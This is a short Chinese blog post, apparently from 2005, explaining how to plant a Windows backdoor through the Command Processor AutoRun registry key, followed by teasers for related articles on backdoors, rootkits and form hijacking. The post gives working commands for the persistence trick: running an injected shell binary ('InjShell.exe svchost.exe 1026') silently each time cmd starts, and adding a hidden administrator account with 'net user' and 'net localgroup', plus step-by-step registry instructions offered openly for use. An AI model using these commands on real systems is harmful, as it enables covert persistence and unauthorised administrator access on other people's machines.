后门

原创 2005年02月28日 14:25:00
Mix老装一幅正人君子的样子,说写文档,哼哼。。。。

无聊,cmd /?后看见好多东西,其中有个好玩的: 
******************* 
如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找 
以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 
两个都存在,这两个变量会先被执行。 

HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor/AutoRun 

和/或 

HKEY_CURRENT_USER/Software/Microsoft/Command Processor/AutoRun 
****************** 
呵呵,又是一个放后门的好地方。我用@c:/InjShell.exe svchost.exe 1026 >nul 后,打开CMD什么异常现象都没有(当然不包括c:/InjShell.exe)。如果用net user mix /add & net localgroup administrators mix /add 岂不是成了《不死帐号》续集?大家自己琢磨吧~~~ 

有人问具体的做法,随手写写,还不懂的话,就是我的表达能力有问题了 :)呵呵 

先用regedit打开HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor或HKEY_CURRENT_USER/Software/Microsoft/Command Processor ,看见这个主健下是不是有AutoRun健,将AutoRun键值改为你想要得命令即可。比如我上面用的用@c:/InjShell.exe svchost.exe 1026 >nul ,有人使用cmd的话,就会自动执行你设置的命令。 

相关文章推荐

如何劫持软件更新来安装 Rootkit 的后门访问

有无数种方法破解系统。如果我们想应用自己的系统,我们不应该忽视任何的可能性,我们需要搜索弱点保持警惕。在这次破解,我们将会看看滥用信任用户对软件更新,他们的系统上安装监听器/rootkit。 利...

如何检查下载的软件是否带有后门

现在网络上的东西愈来愈不可信了。 不论下载什么工具都得多个心眼,特别是经常玩黑的朋友。 俗话说:常在河边走,哪有不湿鞋。弄不好哪天自己就中招了。 下面我就简单分析下,如何判断软件是否...

那些强悍的PHP一句话后门

http://www.freebuf.com/articles/web/9396.html 我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们...
  • ncafei
  • ncafei
  • 2017年01月19日 22:17
  • 141

【软件后门】QQ密码框 - 2010

(两个windows消息钩子(WH_DEBUG\WH_KEYBOARD_LL) + WM_TIMER + 输入框自动设置虚假的按键消息) 1、WH_DEBUG 原理: WH_DEBUG管理以下类型的钩...

钩子编程(HOOK) 留后门与钩子卸载 (2)

[钩子编程(HOOK) 留后门与钩子卸载]根据前面几篇文章对进程内钩子有了个初步了解,本文继续谈及钩子卸载问题。一般编写钩子程序,我们希望程序一方面能屏蔽键盘鼠标消息,但又希望程序能留有一个“后门”,...

伪装在系统PAM配置文件中的同形异义字后门

* 原创作者:fnpimr43017,本文属FreeBuf原创奖励计划,未经许可禁止转载 0×00. 前言 受到 这篇文章 启发,故有此文。 目前主流的Linux发行版本都支持Unicode...

如何让网卡后门搞死一个系统,让你知道网卡是个多么厉害的角色

最近本人在FPGA上做开发,课题是以太网控制器IP核。 发现这里面可以嵌入一个强大的后门。 如果你知道以太网的工作过程,就好懂多了。 以太网协议如此要求,首先,网卡会接受数据,无论是发给谁的。第...

CentOS后门入侵检测工具

一、rootkit简介 rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很...

javascript表单劫持用户密码(后门免杀)

试验开始 javascript表单劫持 其实应该可以留有很多后门,但是我暂时只想到这一种,还希望社区的大神能够完善这篇文章·~~~~ 原理:在正常的登陆页面,留下一段恶意JS代...
  • wodafa
  • wodafa
  • 2017年05月19日 13:59
  • 458

[转]奇虎360黑匣子之谜:暗藏后门盗取用户隐私

每经记者 秦俑   昨日(2月25日),正是奇虎360所有APP产品被苹果全面下架一个月的日子。   就在此前,360的CFO亲赴美国“负荆请罪”,但360相关产品并未重新上架。  ...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:后门
举报原因:
原因补充:

(最多只允许输入30个字)